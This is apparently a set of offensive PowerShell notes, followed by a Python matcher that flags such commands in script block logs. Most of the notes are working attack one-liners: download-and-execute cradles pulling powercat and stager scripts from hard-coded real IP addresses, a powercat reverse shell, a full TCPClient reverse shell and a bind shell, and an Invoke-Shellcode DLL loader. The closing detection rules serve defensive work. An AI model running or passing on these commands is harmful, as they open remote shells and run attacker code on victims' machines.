Starting with Windows 7 / Windows Server 2008,
Windows ships with the PowerShell tool.
PowerShell is a command-line shell and scripting environment.
File path:
where powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Supported systems: Windows 7 / Windows Server 2008 and later
powershell (New-Object Net.WebClient).DownloadFile('http://url/aa.ps1','c:\bb.ps1')
PowerShell: a powerful command-line tool that can be used to download files to disk and to manage network connections.
powershell -Command "& 'path\to\program.exe'"
PowerShell\ConvertTo-Shellcode.ps1: converts a DLL into shellcode
Convert the DLL with PowerShell and load it with Invoke-Shellcode:
Import-Module .\Invoke-Shellcode.ps1
Import-Module .\ConvertTo-Shellcode.ps1
Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://101.43.159.27/powercat.ps1')
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://101.43.159.27/powercat.ps1');powercat -c 101.43.159.27 -p 1474 -e cmd
exec("powershell IEX (New-Object System.Net.Webclient).DownloadString('http://101.43.159.27/powercat.ps1');powercat -c 101.43.159.27 -p 1474 -e cmd");
iex(new-object system.net.webclient).DownloadString('http://101.43.159.27/cslow.ps1')
- powershell iex(new-object system.net.webclient).DownloadString('http://101.43.159.27/cslow.ps1')
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://101.43.159.27/cs32low.ps1')"
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('120.48.83.89',12369);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
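The one-liners above share a handful of recognisable tokens (IEX plus DownloadString, Net.WebClient plus DownloadFile, a TcpClient/TcpListener with GetStream feeding iex, Invoke-Shellcode with ConvertTo-Shellcode) that PowerShell script block logging (Event ID 4104) records verbatim. As an added example, not part of these notes, here is a small Python matcher run over constructed ScriptBlockText samples; the rule names, regexes and sample lines are my own and the hosts in them are placeholders.

```python
import re

# Each rule maps a name to regexes that must ALL match (case-insensitive).
# The tokens are taken from the download cradles, shells and loader above.
RULES = {
    "download_cradle":  [r"\bIEX\b|Invoke-Expression", r"\.DownloadString\("],
    "file_download":    [r"Net\.WebClient", r"\.DownloadFile\("],
    "tcp_shell":        [r"System\.Net\.Sockets\.Tcp(Client|Listener)",
                         r"\.GetStream\(\)", r"\biex\b"],
    "shellcode_loader": [r"Invoke-Shellcode", r"ConvertTo-Shellcode"],
}


def classify(script_block: str) -> list:
    """Return the names of every rule whose patterns all match the script block."""
    return [
        name for name, patterns in RULES.items()
        if all(re.search(p, script_block, re.IGNORECASE) for p in patterns)
    ]


# Constructed sample 4104 ScriptBlockText values (not real telemetry).
SAMPLES = [
    "IEX (New-Object System.Net.Webclient).DownloadString('http://EXAMPLE/powercat.ps1')",
    "(new-object System.Net.WebClient).DownloadFile('http://EXAMPLE/wget.exe','C:\\tmp\\wget.exe')",
    "$client = New-Object System.Net.Sockets.TCPClient('EXAMPLE',4444);$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)",
    "Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)",
    "Get-ChildItem C:\\Windows\\System32 | Where-Object Name -like '*.dll'",  # benign
]


def scan(lines):
    """Map each logged script block to its rule hits; benign lines map to []."""
    return {line: classify(line) for line in lines}


if __name__ == "__main__":
    for line, hits in scan(SAMPLES).items():
        print(f"{', '.join(hits) or '-':18} {line[:70]}")
```

A bind shell built on TcpListener (as in the 0.0.0.0:443 listener above) triggers the same tcp_shell rule as the TcpClient variant.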